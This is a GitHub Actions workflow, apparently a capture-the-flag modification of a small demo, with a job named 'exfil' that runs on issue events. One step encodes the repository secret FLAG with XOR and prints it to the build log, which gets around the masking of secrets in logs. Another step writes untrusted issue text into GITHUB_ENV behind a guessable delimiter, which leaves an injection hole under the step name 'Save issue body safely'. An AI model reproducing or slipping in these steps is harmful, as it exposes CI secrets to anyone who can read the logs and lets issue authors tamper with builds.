name: 'GitHub Actions just works'

on:
  issues:

jobs:
  exfil:
    runs-on: ubuntu-24.04
    steps:
      - name: Save issue body safely
        env:
          BODY: ${{ github.event.issue.body }}
          TITLE: ${{ github.event.issue.title }}
        run: |
          echo "ISSUE_TITLE=$(echo "$TITLE" | tr '\n' ' ')" >> $GITHUB_ENV
          printf "ISSUE_BODY<<EOF\n%s\nEOF\n" "$BODY" >> $GITHUB_ENV

      - name: Leak FLAG via XOR ord values
        shell: python
        env:
          FLAG: ${{ secrets.FLAG }}
        run: |
          import os, json
          KEY = 0x37
          flag = os.environ["FLAG"]
          data = [ord(c)^KEY for c in flag]
          print("XOR_KEY=", KEY)
          print("LEN=", len(data))
          print("XOR_BYTES=", json.dumps(data))
          import hashlib
          print("SHA256_XOR_STREAM=", hashlib.sha256(bytes(data)).hexdigest())

      - name: Original demo
        shell: python
        run: print(40+2)
